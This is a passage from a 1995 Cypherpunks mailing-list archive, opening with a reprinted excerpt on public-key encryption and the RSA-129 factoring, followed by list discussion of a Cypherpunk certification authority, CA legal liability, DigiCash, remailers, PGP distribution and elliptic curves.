the number of computers and computer users in the world.
In 1993 a group of more than 600 academics and hobbyists
from around the world began an assault on the 129-digit
number, using the Internet to coordinate the work of
various computers. In less than a year they factored the
number into two primes, one 64 digits long and the other
65. The primes are as follows:

   3,490,529,510,847,650,949,147,849,619,903,898,133,
   417,764,638,493,387,843,990,820,577

and

   32,769,132,993,266,709,549,961,988,190,834,461,413,
   177,642,967,992,942,539,798,288,533

And the encoded message says: "The magic words are
squeamish and ossifrage."

One lesson that came out of this challenge is that a
129-digit public key is not long enough if the
information being encrypted is really important and
sensitive. Another is that no one should get too cocksure
about the security of encryption.

Increasing the key just a few digits makes it much more
difficult to crack. Mathematicians today believe that a
250-digit-long product of two primes would take millions
of years to factor with any foreseeable amount of future
computing power. But who really knows? This uncertainty
-- and the unlikely but conceivable possibility that
someone could come up with an easy way of factoring big
numbers -- means that a software platform for the
information highway will have to be designed in such a
way that its encryption scheme can be changed readily.

One thing we don't have to worry about is running out of
prime numbers, or the prospect of two computers'
accidentally using the same numbers as keys. There are
far more prime numbers of appropriate length than there
are atoms in the universe, so the chance of an accidental
duplication is vanishingly small.

Key encryption allows more than just privacy. It can also
assure the authenticity of a document because a private
key can be used to encode a message that only the public
key can decode. It works like this: If I have information
I want to sign before sending it to you, my computer uses
my private key to encipher it. Now the message can be
read only if my public key -- which you and everyone else
knows -- is used to decipher it. This message is
verifiably from me, because no one else has the private
key that could have encrypted it in this way.

My computer takes this enciphered message and enciphers
it again, this time using your public key. Then it sends
this double-coded message to you across the information
highway.

Your computer receives the message and uses your private
key to decipher it. This removes the second level of
encoding but leaves the level I applied with my private
key. Then your computer uses my public key to decipher
the message again. Because it really is from me, the
message deciphers correctly and you know it is authentic.
If even one bit of information was changed, the message
would not decode properly and the tampering or
communications error would be apparent. This
extraordinary security will enable you to transact
business with strangers or even people you distrust,
because you'll be able to be sure that digital money is
valid and signatures and documents are provably
authentic.

Security can be increased further by having time stamps
incorporated into encrypted messages. If anyone tries to
tinker with the time that a document supposedly was
written or sent, the tinkering will be detectable. This
will rehabilitate the evidentiary value of photographs
and videos, which has been under assault because digital
retouching has become so easy to do.

My description of public-key encryption oversimplifies
the technical details of the system. For one thing,
because it is relatively slow, it will not be the only
form of encipherment used on the highway. But publickey
encryption will be the way that documents are signed,
authenticity is established, and the keys to other kinds
of encryption are distributed securely.


[Critical Issues, pp. 265-66, 270-71]

This versatility will be the strength of the network, but
it will also mean we will become reliant on it.

Reliance can be dangerous. During the New York City
blackouts in 1965 and 1977, millions of people were in
trouble -- at least for a few hours -- because of their
dependence on electricity. They counted on electric power
for light, heat, transport, and security. When
electricity failed, people were trapped in elevators,
traffic lights stopped working, and electric water pumps
quit. Anything really useful is missed when you lose it.

A complete failure of the information highway is worth
worrying about. Because the system will be thoroughly
decentralized, any single outage is unlikely to have a
widespread effect. If an individual server fails, it will
be replaced and its data restored. But the system could
be susceptible to assault. As the system becomes more
important, we will have to design in more redundancy. One
area of vulnerability is the system's reliance on
cryptography -- the mathematical locks that keep
information safe.

None of the protection systems that exist today, whether
steeringwheel locks or steel vaults, are completely
fail-safe. The best we can do is make it as difficult as
possible for somebody to break in. Despite popular
opinions to the contrary, computer security has a very
good record. Computers are capable of protecting
information in such a way that even the smartest hackers
can't get at it readily unless someone entrusted with
information makes a mistake. Sloppiness is the main
reason computer security gets breached. On the
information highway there will be mistakes, and too much
information will get passed along. Someone will issue
digital concert tickets that prove to be forgeable, and
too many people will show up. Whenever this sort of thing
happens, the system will have to be reworked and laws may
have to be revised.

Because both the system's privacy and the security of
digital money depend on encryption, a breakthrough in
mathematics or computer science that defeats the
cryptographic system could be a disaster. The obvious
mathematical breakthrough would be development of an easy
way to factor large prime numbers. Any person or
organization possessing this power could counterfeit
money, penetrate any personal, corporate, or governmental
file, and possibly even undermine the security of
nations, which is why we have to be so careful in
designing the system. We have to ensure that if any
particular encryption technique proves fallible, there is
a way to make an immediate transition to an alternate
technique. There's a little bit of inventing still to be
done before we have that perfected. It is particularly
hard to guarantee security for information you want kept
private for a decade or more.

[Good section on privacy protection elided]

At the same time technology is making it easier to create
video records, it is also making it possible to keep all
your personal documents and messages totally private.
Encryption-technology software, which anyone can download
from the Internet, can transform a PC into a virtually
unbreakable code machine. As the highway is deployed,
security services will be applied to all forms of digital
information -- phone calls, files, databases, you name
it. As long as you protect the password, the information
stored on your computer can be held under the strongest
lock and key that has ever existed. This allows for the
greatest degree of information privacy any individual has
ever had.

Many in government are opposed to this encryption
capability, because it reduces their ability to gather
information. Unfortunately for them, the technology can't
be stopped. The National Security Agency is a part of the
U.S. government defense and intelligence community that
protects this country's secret communications and
decrypts foreign communications to gather intelligence
data. The NSA does not want software containing advanced
encryption capabilities to be sent outside the United
States. However, this software is already available
throughout the world, and any computer can run it. No
policy decision will be able to restore the tapping
capabilities governments had in the past.

Today's legislation that prevents the export of software
with good encryption capability could harm U.S. software
and hardware companies. The restrictions give foreign
companies an advantage over U.S. competitors. American
companies almost unanimously agree that the current
encryption export restrictions don't work.

-----













From nobody at REPLAY.COM  Sat Nov 25 08:07:09 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Sun, 26 Nov 1995 00:07:09 +0800
Subject: Money: Back to the Future?
Message-ID: <199511250137.CAA12316@utopia.hacktic.nl>



Wall Street Journal, Nov 23, 1995.

Money: Back to the Future?

By Walter Wriston (Former chairman of Citicorp)

Americans are about to begin using a new kind of money
that may have consequences for the Federal Reserve's
control of the money supply and almost certainly for the
velocity of money.

Over the years, people have used all kinds of things for
money, from the huge immovable stones in the front yards
of the residents of Yap Island to the more familiar
silver and gold. All these various mediums of exchange
will now be joined in our country by the "smart" card --
a piece of plastic embedded with a microchip.

Smart cards combine features of the following: automatic
teller machine cards that let you access your bank
account and draw cash; MasterCard or Visa cards that
permit you to buy now and pay later; and debit cards that
charge an account at the time of purchase. Not only can
smart cards do all of the above but they can also serve
as an "electronic purse" independent of your bank
account. These cards contain real money that can be spent
at stores and restaurants. In effect, the card is an
electronic traveler's check, but one that makes exact
change. In addition, the integrated circuit chip allows
a higher degree of security for the information stored
than do the current magnetic strip cards.

Smart cards are common in Europe and Asia, where some 400
million were shipped last year. The first large-scale use
of smart cards in this country will occur next year at
the Summer Olympics in Atlanta. Plans call for 300,000
rechargeable cards, and 700,000 disposable cards in
denominations of $25, $50 and $100. These cards would fit
nicely into the payment habits of Americans, since in the
U.S. it is estimated that 88% of transactions are done by
cash or check, and of these 83% are for less than $10. In
Atlanta, electronic "purse cards," which contain stored
value, could be spent at pay phones or vending machines.
When their stored value is exhausted, they are thrown
away. The smart cards, by contrast, can be taken back to
the issuer and recharged.

Their broad issuance and use could return America to
something very close to the free banking of the last
century, when every commercial bank issued dollar bills,
backed sometimes by the skill of the management,
sometimes by doubtful state bonds and sometimes by gold
or silver.

We have grown so accustomed to the familiar Federal
Reserve note that many forget that Americans had no
central bank for about 75 years -- from 1836, when
President Jackson vetoed the bill to renew the charter of
the Second Bank of the United States, to the start of
World War I, when the Federal Reserve Act was passed.
After the passage by New York state of the Free Banking
Act in 1838, the idea of state-chartered banks spread
across the country, and each commercial bank issued its
own dollar bills of various shapes and sizes.

This does not mean that the 19th century witnessed
complete currency chaos. In 1863, the National Bank Act
was passed to create a market in the government bonds
needed to finance the Civil War and to bring some order
to the private issuance of currency. The act required
that bank notes issued by commercial banks be uniform in
appearance and that they be backed by collateral
consisting of U.S. Treasury securities. As the old Civil
War bonds were paid off, the currency base of the country
declined some 60% from 1881 to 1890. This inflexible
system led to panics and instability.

To a certain extent, the Treasury Department during this
time assumed some of the functions of a central bank. All
during this period a debate raged, not about whether
America needed a central bank but about "free silver" and
the price at which the Treasury would buy gold and
silver. It was not until the eve of World War I that
passage of the Federal Reserve Act finally gave the U.S.
government a monopoly on the creation of money.

Now we may be going back to the future. The advent of
smart cards means that the Fed will lose its monopoly on
issuing currency, except that this time the new money
will be issued not only by banks but by all kinds of
companies, from convenience stores to telephone
companies. Nor is this the only trend threatening the
Fed's monopoly: Information technology is about to permit
the creation of both electronic token money and cash
money in cyberspace. Already we have Digi Cash in
Amsterdam reviving in modern guise something very close
to the old American free-banking system -- issuing
electronic money (backed by some depository bank holding
collateral in the form of Treasury securities) and
performing the clearing function.

None of this is necessarily a cause for panic. There is
very little, if any, evidence that government has managed
our currency values any better than the commercial banks
did in pre-Fed days. Indeed, the Nobel laureate economist
F.A. Hayek put it more strongly: "The history of
government management of money has, except for a few
short happy periods, been one of incessant fraud and
deception."

Still these new trends do present worries for central
bankers. If more and more firms issue cards for cash or
credit, what will be the effect on the velocity of money?
How will central banks form policies on the control of
the money supply if any company can issue electronic
purse cards on credit, with or without collateral? What
will happen if the issuer of the card goes broke?

As smart cards become more visible in America, regulators
and governments will begin to wonder about control of
money and credit. The Eulopean system of central banks
has produced an advisory report outlining a possible
regulatory response, and in this countly some Fed
officials are starting to wonder if their regulations
will be applicable. If one definition of money is an
object that has no use except to be given to someone else
in exchange for goods or services, smart cards are money
-- and they are coming to your neighborhood soon.

-----













From perry at piermont.com  Sat Nov 25 08:57:25 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sun, 26 Nov 1995 00:57:25 +0800
Subject: Cypherpunk Certification Authority
In-Reply-To: <Pine.SUN.3.91.951124235921.16448A@dfw.net>
Message-ID: <199511251650.LAA01055@jekyll.piermont.com>



Aleph One writes:
> 	Since now Netscape allows for user defined certification authorities
> I would like to hear some ideas for a Cybpherpunk CA. Probably run by one 
> of the respected member in the group such as Sammer, Perry or Tim. I would
> like to hear some discussion about creating the certificates based on
> the web of trust of your PGP key, etc. Any takers?

Hmmm. If someone is willing to find out what is needed to become a
C.A. and to run one, and it turns out not to be particularly onerous,
I or one of my corporate alter egos might be willing. I must say,
though, that being an anti-fan of X.509 the situation would be ironic...

Perry





From sameer at c2.org  Sat Nov 25 09:45:59 1995
From: sameer at c2.org (sameer)
Date: Sun, 26 Nov 1995 01:45:59 +0800
Subject: Cypherpunk Certification Authority
In-Reply-To: <199511251650.LAA01055@jekyll.piermont.com>
Message-ID: <199511251732.JAA15922@infinity.c2.org>


> though, that being an anti-fan of X.509 the situation would be ironic...
> 
> Perry

	Speaking of ironic situations, my sister recently
mentioned that her fiancee is a good friend of Jim Bidzos and asked
me if I wanted a job with RSADSI. If I wasn't planning on leaving
the employed-by-others arena I would have seriously considered it. ;-)

	In terms of being a CA. I have considered making Community
COnneXion a CA for its customers, but I haven't done much research
into what is involved in doing that.


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer at c2.org





From s1113645 at tesla.cc.uottawa.ca  Sat Nov 25 10:24:18 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Sun, 26 Nov 1995 02:24:18 +0800
Subject: ecash protocol: living in denial
In-Reply-To: <199511250744.SAA14637@sweeney.cs.monash.edu.au>
Message-ID: <Pine.3.89.9511250939.A44825-0100000@tesla.cc.uottawa.ca>




On Sat, 25 Nov 1995, Jiri Baum wrote:

> >    - Ian "Why exactly isn't DigiCash releasing the protocol?  What about
> > 	    the source?"
> ...
> 
> A Source Close To Digicash That Did Not Wish To Be Quoted
> once described them as 'crown jewels' (competitive advantage).
Can you say RC4?

> 
> ASCTDTDNWTBQ then appealed to Digicash's track record.
> 
> I certainly hope that this genuinely is not Digicash's official opinion.
Heh.
Can you say RSADSI? (or Ron Rivest? Or NSA on Mr. Blaze's bogus LEAFs?
Need I say Elementrix non-algorithmic POTP?)

They were lucky Rivest's a decent cryptographer. (which reminds me,
what's the current list of "secure" block ciphers, besides for des and idea?
what's been analyzed or weakened lately? I'm too broke to get Schneier's 
2nd ed. to check.)

> Thank you for once again showing the futility of security by obscurity.

As Ian himself is demonstrating.





From loki at obscura.com  Sat Nov 25 10:41:24 1995
From: loki at obscura.com (Lance Cottrell)
Date: Sun, 26 Nov 1995 02:41:24 +0800
Subject: [rehash] Re: crypto for porno users
Message-ID: <acdd0f7b040210046a9a@[137.110.24.250]>


At 6:05 PM 11/24/95, s1113645 at tesla.cc.uottawa.ca wrote:
>Watch the cpunks go round and round and round and...
>
>On Fri, 24 Nov 1995, Gary Jeffers wrote:
>
>>    I know little of the theory of Dining Cryptographers but I would think
>> that a good implementation of it would make infiltrators useless. I will
>> leave it for other Cypherpunks to discuss the mechanics (specific and
>> general) for actually doing this.
>
>Dining Cryptographers nets (aka DC-nets) are the whole idea behind the
>type 2 anon remailers like Mixmaster, and the remailernet in general.
>You'll find a lot on this in the archives, the ftp site (which has Chaum's
>DC article and a good explanation by Tim May) and a few peoples' pages.
>(I think they're mostly pointed to in the pages I list)
>

I wish this were the case. Mixmaster is not based on the "Dining
Cryptographers" problem, but based on Chaum's "Digital Mixes".

Digital mixes hide the fact that A is communicating with B.
DC nets allow an individual A in a group of people A' to send a message
so that it is impossible to tell who in the group sent it (but it is known
to have been one of the members of A').

        -Lance

----------------------------------------------------------
Lance Cottrell   loki at obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------







From andreas at artcom.de  Sat Nov 25 11:03:26 1995
From: andreas at artcom.de (Andreas Bogk)
Date: Sun, 26 Nov 1995 03:03:26 +0800
Subject: Cypherpunk Certification Authority
In-Reply-To: <199511251650.LAA01055@jekyll.piermont.com>
Message-ID: <m0tJPeV-0002eCC@horten>


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Perry" == Perry E Metzger <perry at piermont.com> writes:

    Perry> become a C.A. and to run one, and it turns out not to be
    Perry> particularly onerous, I or one of my corporate alter egos
    Perry> might be willing. I must say, though, that being an
    Perry> anti-fan of X.509 the situation would be ironic...

;).

Ten easy  steps to become a C.A.:

1. get a copy of SSLeay (try ftp://ftp.cert.dfn.de/pub/tools/net/ssleay)

2. install it

3. generate a key using 'genrsa -idea -rand
/dev/random:/var/adm/messages:/etc/utmp:/proc/net/dev -out
cypherpunks.key 1024'. Substitute a higher number than 1024 depending
on your paranoia. Choose an inconvenient pass phrase.

4. Use your favourite secret splitting method and send key and pass
phrase to respected members of the cypherpunks community.

5. Generate your X.509 certificate using makecert.

6. Sign other people's certificate using x509.

7.-10. Get yourself a decent beer and Applied Crytography 2nd Ed.

Sorry, I'd love to give you details for 5 and 6, but I'm out of
time. I'll deliver them tomorrow.

Andreas

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMLdlB0yjTSyISdw9AQEs5QP/T5K8qdD0lX9NrqsYxcudpUSPBoAOuzUb
oy2IllKpliviJaGZCb5o6ga1jgoCObyhe6HNaaQINOHhWyP09Gzs+jdNxMsqcK1z
Vxt9NOH+cHyBC67rPU77vDwB27dXNIob+u1KwKldWkSB3Id+qLR+Pz5yXylYAMhI
ccuVcA0BpOU=
=iGp+
-----END PGP SIGNATURE-----





From carolann at censored.org  Sat Nov 25 12:19:58 1995
From: carolann at censored.org (Censored Girls Anonymous)
Date: Sun, 26 Nov 1995 04:19:58 +0800
Subject: PGP Distribution Site at MIT *DOWN*
Message-ID: <199511252011.NAA01255@mailhost1.primenet.com>


-----BEGIN PGP SIGNED MESSAGE-----

On Sat Nov 25th, 1995:
>We apologize for the inconvenience and hope to have full service
>restored shortly.
>                               -Jeff

Can you PLEASE put the .org permissions back in it!
Thanks ever so much. censored.org can't get in.

Love Always,

Carol Anne
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLd3ZorpjEWs1wBlAQHQXQP9EzvOuKxWs3f1gLPbhmUC7BMJcHLR8Dfz
jeU0AyGsxp9KWvfeut2nNzbSYsAgzLGUwmoQcU66t8iJPCXVW/mCORo5R1tExi+p
RFlPrhyfJyDxJfNT/RzRlrQT6KDj5U4AizIliaGdVh3KVHUmOiUNxX/4FAUQTKpl
c+kEefbMElI=
=9Y9F
-----END PGP SIGNATURE-----
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann at censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/






From froomkin at law.miami.edu  Sat Nov 25 12:29:09 1995
From: froomkin at law.miami.edu (Michael Froomkin)
Date: Sun, 26 Nov 1995 04:29:09 +0800
Subject: Cypherpunk Certification Authority
In-Reply-To: <m0tJPeV-0002eCC@horten>
Message-ID: <Pine.SUN.3.91.951125150446.848J-100000@viper.law.miami.edu>


Alas, certain critical social steps have been elided in the proposed 
protocol.  As it happens, I'm working on an article, to be published in 
the Oregon Law Review next year, on "The Importance of Trusted Third 
Parties in Electronic Commerce".  It's mostly about the care and feeding 
(and legal liability!) of a CA.  Unfortunately for this discussion, I'm 
only part way through my thinking about what the liability of a CA might 
be so I don't have carefully considered conclusions to offer you.  Try me 
again in a few weeks.

In the absence of legislation...

[PLUG:  if you haven't already done so, RUSH to my homepage

http://www.law.miami.edu/~froomkin

and click on the link to the ABA draft of the digital signature 
guidelines.  This mis-named document is actually all about CA liability.  
Comment period now extended to mid-January.]

...you need to worry about who might *use* the certificates, and what they
might to do the CA in the case of mis-certification or other misfortune. 
At the very least, there is a tort claim for "negligent
mis-representation" the first time an inaccurate certificate, or an
accurate certificate referencing a compromised key, is used in a
transaction that goes sour. 

I don't give legal advice on line, ever, so I can't tell you how to avoid
liability. I'm not even sure that this is possible absent legislation.  I
can, however, mention techniques that at this writing seem to me to be an
essential part of any liability-reduction strategy, without any claim that
these alone suffice to protect you to the level that I would want to be
protected (I'm a cautious guy). 
  
Repeat: I do claim that pending further thought these steps seem necessary, 
**not** that they are sufficient:

A) Establish a clear certification policy document, describing in detail 
what checks are made before issuing a certificate, how quickly CRLs are 
posted, and where.  This doesn't mean onerous checks are necessary, just 
that you need to be clear as to what checking a certficiate from you 
emboidies.  Publish this document.

B) Reference this policy document in every certificate.

C) Don't settle for less than X.509 ver 3, because this allows the 
certificate to carry within it a reference to the location of the CRL 
list.  Use that feature.

D) Establish a very reliable mechanism to ensure CRLs are posted where 
and when they should be.

E) Use a secure, trusted, computer system.

Again, I note that this is NOT a complete list of what you need to do. 
For more inspiration consult the ABA document referenced above. 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin at law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.






From aleph1 at dfw.net  Sat Nov 25 12:33:08 1995
From: aleph1 at dfw.net (Aleph One)
Date: Sun, 26 Nov 1995 04:33:08 +0800
Subject: Cypherpunk Certification Authority
In-Reply-To: <199511251650.LAA01055@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.951125141719.4185B-100000@dfw.net>


On Sat, 25 Nov 1995, Perry E. Metzger wrote:

> Hmmm. If someone is willing to find out what is needed to become a
> C.A. and to run one, and it turns out not to be particularly onerous,
> I or one of my corporate alter egos might be willing. I must say,
> though, that being an anti-fan of X.509 the situation would be ironic...
> 
> Perry

Well from Netscape perspetive as far as I know you need nothing. Basicly
when the browser finds a new CA that it does know about it promts
the user and through a series of dialog boxes the user chooses to trust
it or not. (Well that is theory, and what netscape release notes say, since
I dont have access to an SSL server right now, and would need to figure
out how to make my own certificate, I havent tried it).

Aleph One / aleph1 at dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 






From aleph1 at dfw.net  Sat Nov 25 12:51:44 1995
From: aleph1 at dfw.net (Aleph One)
Date: Sun, 26 Nov 1995 04:51:44 +0800
Subject: Cypherpunk Certification Authority
Message-ID: <Pine.SUN.3.91.951124235921.16448A@dfw.net>


	Since now Netscape allows for user defined certification authorities
I would like to hear some ideas for a Cybpherpunk CA. Probably run by one 
of the respected member in the group such as Sammer, Perry or Tim. I would
like to hear some discussion about creating the certificates based on
the web of trust of your PGP key, etc. Any takers?

Aleph One / aleph1 at dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 






From adam at lighthouse.homeport.org  Sat Nov 25 13:09:38 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Sun, 26 Nov 1995 05:09:38 +0800
Subject: Cypherpunk Certification Authority
In-Reply-To: <Pine.SUN.3.91.951125150446.848J-100000@viper.law.miami.edu>
Message-ID: <199511252105.QAA08724@homeport.org>



| C) Don't settle for less than X.509 ver 3, because this allows the 
| certificate to carry within it a reference to the location of the CRL 
| list.  Use that feature.

	Does X.509 version 3 fix the problem that Ross Anderson points
out in his 'Robustness Principles' paper? (Crypto '95 proceedings, or
ftp.cl.cam.ac.uk/users/rja14/robustness.ps.Z)

	Its an excellent paper, well worth reading, but the basic
problem is that X.509 encrypts before signing.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From moroni at scranton.com  Sat Nov 25 13:32:40 1995
From: moroni at scranton.com (Moroni)
Date: Sun, 26 Nov 1995 05:32:40 +0800
Subject: crypto for porno users
In-Reply-To: <01HY1C15AVLC8WYI84@mbcl.rutgers.edu>
Message-ID: <Pine.LNX.3.91.951125171338.8831A-100000@prufrocks.scranton.com>



   I'm soory but I don't care if the images come from mars . Jerking off 
to the images of kids is sick.






From cp at proust.suba.com  Sat Nov 25 13:48:21 1995
From: cp at proust.suba.com (Alex Strasheim)
Date: Sun, 26 Nov 1995 05:48:21 +0800
Subject: Cypherpunk Certification Authority
In-Reply-To: <Pine.SUN.3.91.951125141719.4185B-100000@dfw.net>
Message-ID: <199511252135.PAA01435@proust.suba.com>


> Basicly when the browser finds a new CA that it does know about it promts
> the user and through a series of dialog boxes the user chooses to trust it
> or not. 

Is anyone running an ssl web server that would let us see how this works?







From ahupp at primenet.com  Sat Nov 25 15:07:41 1995
From: ahupp at primenet.com (Adam Hupp)
Date: Sun, 26 Nov 1995 07:07:41 +0800
Subject: Cypherpunks article in The Nando Times
Message-ID: <199511252256.PAA05780@usr1.primenet.com>


Check out

http://www.nando.net/newsroom/ntn/info//101095/info446_33.html

Its an article about the cypherpunks, mostly bullshit and hyperbole.  I
especially liked the parts about "Larry Detweiler" and this quote from Jim
Kallston, of the FBI: "We're not trying to stop technology," Kallston said.
"We're trying to collect information on criminals and terrorists and child
pornographers."  What happened to the fourth horseman Jim?
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQBtAzCNppQAAAEDALhWZl7IuGZ9zZT5bACo0b/1L0Nv0C72vKHIO3IHh+cwpHHa
2Ozb9aeO0UvXGwkkZIYgUm0EvmzKh7yb1GTLvBp5kXpR3I9w+Yj4LGlBDERpUWw6
x4ED49pwDnz1Hl5FBQAFEbQYYXNoIDxhaHVwcEBwcmltZW5ldC5jb20+
=PtJK
-----END PGP PUBLIC KEY BLOCK-----






From jya at pipeline.com  Sat Nov 25 15:14:35 1995
From: jya at pipeline.com (John Young)
Date: Sun, 26 Nov 1995 07:14:35 +0800
Subject: SAC_lam
Message-ID: <199511252302.SAA20929@pipe4.nyc.pipeline.com>


   11-25-95. Washrag:

   "Hacking Away at the Internet's Web. Security Concerns Grow
   as Saboteurs Target On-Line Sites."

      Computer hackers are turning their unwelcome attentions
      to the World Wide Web. Web sites are among the easiest
      places on the Internet to disrupt and sabotage, experts
      say, in part because many of the people who set up such
      displays pay little attention to security. Such
      unprotected systems located outside of a secure network
      are often called "sacrificial lambs," noted a manager at
      Trusted Information Systems Inc.

   SAC_lam  (8 kb)













From jya at pipeline.com  Sat Nov 25 15:15:26 1995
From: jya at pipeline.com (John Young)
Date: Sun, 26 Nov 1995 07:15:26 +0800
Subject: NOF_uss
Message-ID: <199511252301.SAA20824@pipe4.nyc.pipeline.com>


   Science, Nov 17, 1995:

   "Security Schemes Aspire to No Fuss System Protection."

      Because of the painful trade offs between security and
      usability that come with current protective measures,
      computer scientists have heen investigating new ways to
      detect and ward off intruders that present fewer
      obstacles to users and administrators. Two of the most
      intriguing directions announced at the Baltimore
      security conference were reported by researchers at
      Purdue University's Computer Operations, Audit, and
      Security Technology laboratory (COAST). The first was an
      attempt to harness techniques from artificial
      intelligence to detect intrusions; the second, a pilot
      test of what has been called software forensics -- an
      effort to recognize malign programs by identifying the
      fingerprints of their creators.

   NOF_uss  (15 kb)













From norm at netcom.com  Sat Nov 25 15:50:13 1995
From: norm at netcom.com (Norman Hardy)
Date: Sun, 26 Nov 1995 07:50:13 +0800
Subject: Learning Elliptic Curves
Message-ID: <acdc748500021004e06b@DialupEudora>


I have found an easy introduction to elliptic curves. It is "Rational
Points on Elliptic Curves" by Joseph H. Silverman & John Tate.
(Springer-Verlag ISBN: 0-387-97825-9 or 3-540-97825-9) It is a breezy
undergraduate introduction. It emphasizes the mathematical elegance. It
mentions crypto applications but does not delve deeply.

Schneier recommends "Elliptic Curve Public Key Cryptosystems" by Alfred J.
Menezes. (Kluwer Academic Publishers ISBN: 0-7923-9368-6) That book has
only a very compressed theory section which already requires knowledge of
field theory. I think that the first book is a good intro to the second,
which does cover crypto applications.

What I learned is that elliptic curves are an alternative to finite fields
for crpto purposes. Here is what they have in common:
There are many (2^70 -- 2^2000) values any one of which can be represented
in the machine in constant space. a_i is the ith one of these values. If
someone sends you a_i it is real hard to figure out what i is. There is an
operation that isn't too expensive for computing a_(i+j) given a_i and a_j.
For some big integer i you can compute a_i in about (log i)^3 steps. For
RSA, knowing how to do these two computations does not reveal what the
period of the sequence is, i.e. what is the first i such that a_0 = a_i.
Knowing the period is tantamount to knowing the private key.







From jis at mit.edu  Sat Nov 25 16:11:01 1995
From: jis at mit.edu (Jeffrey I. Schiller)
Date: Sun, 26 Nov 1995 08:11:01 +0800
Subject: PGP Distribution Site at MIT *DOWN*
Message-ID: <acdd1d160002100417e5@[18.72.0.238]>


-----BEGIN PGP SIGNED MESSAGE-----

The anonymous FTP server running on net-dist.mit.edu (which is also
bitsy.mit.edu) is currently down due to a failure of the disk drive
that hosts the files. We expect to replace the disk this afternoon
(Saturday) and begin restoral operational as soon as the new disk
is cabled up.

We apologize for the inconvenience and hope to have full service
restored shortly.

                                 -Jeff

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLdruMUtR20Nv5BtAQELyAP/ekj4hTskW7rEqW5lTidmE67yjqxDWlj0
ahCYBpGOHyE6SRmoCNpjAyHkTu0As1rfdcyZOziDdlHkYWgyxPu3yjrQ9J5yvpM7
V+Q2EWSHHePjlXx9oyHa6FwkgwUkwTAQpuZBC9fu9Jp0HxPs7a6JC+6WSAJi342J
EDGnqFtxTp8=
=+MsK
-----END PGP SIGNATURE-----







From jis at mit.edu  Sat Nov 25 16:17:42 1995
From: jis at mit.edu (Jeffrey I. Schiller)
Date: Sun, 26 Nov 1995 08:17:42 +0800
Subject: MIT Distribution Site (FTP) for PGP and Other Products *DOWN*
Message-ID: <acdd5fac0002100427f5@[18.162.1.1]>


-----BEGIN PGP SIGNED MESSAGE-----

In article <jis-2511951419240001 at road-warrior.mit.edu>, jis at mit.edu
(Jeffrey I. Schiller) wrote:

> The anonymous FTP server running on net-dist.mit.edu (which is also
> bitsy.mit.edu) is currently down due to a failure of the disk drive
> that hosts the files. We expect to replace the disk this afternoon
> (Saturday) and begin restoral operational as soon as the new disk
> is cabled up.

Service is now restored (on a new disk).

                                 -Jeff

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLeu8sUtR20Nv5BtAQGQGgP8CCm6SJdkxNAv125clOeWq/3VEFMBGgx7
GTpZIKcZutWSqBbC8ATUDoyqcIURR+xEUvKxegktauYkS+fdfHnqsD84OnA1lG2X
4bOwO8G9zA2Uy93lcVrM4WrAYE1J4hseiuhFK6T4kGbHek91ZU/dY5xGjgo+3Wrm
FeYXRwfujJY=
=hAXB
-----END PGP SIGNATURE-----







From jimbell at pacifier.com  Sat Nov 25 16:22:08 1995
From: jimbell at pacifier.com (jim bell)
Date: Sun, 26 Nov 1995 08:22:08 +0800
Subject: Gingrich, "crypto coalition" & dysfunctional philosophy
Message-ID: <m0tJUWY-0008yoC@pacifier.com>


The detweiler tentacle is afraid to debate me...


>To: "Vladimir Z. Nuri" <vznuri at netcom.com>
>From: jimbell at pacifier.com (jim bell)
>Subject: Re: Gingrich, "crypto coalition" & dysfunctional philosophy 
>
>>well, I don't really care about convincing anarchists that you're
>>a bozo. it's reasonable people who it would scare me if they began
>>to take you seriously.
>
>Then start being "scared."  I guess you have lots of practice.
>
>> frankly I'm not convinced that anyone with
>>half a brain is taking you seriously.
>
>I don't have to convince you of anything!  You wimped out!  You claimed
that you would be happy to debate me IN PUBLIC!  Well, I did and you ran
away with you tail between your legs!
>
>Stop being a wuss!  If you're as correct as  you claim you are, you have no
reason to fear.  Debate, dammit!
>






From jya at pipeline.com  Sat Nov 25 16:26:54 1995
From: jya at pipeline.com (John Young)
Date: Sun, 26 Nov 1995 08:26:54 +0800
Subject: AI and Author-ID Security
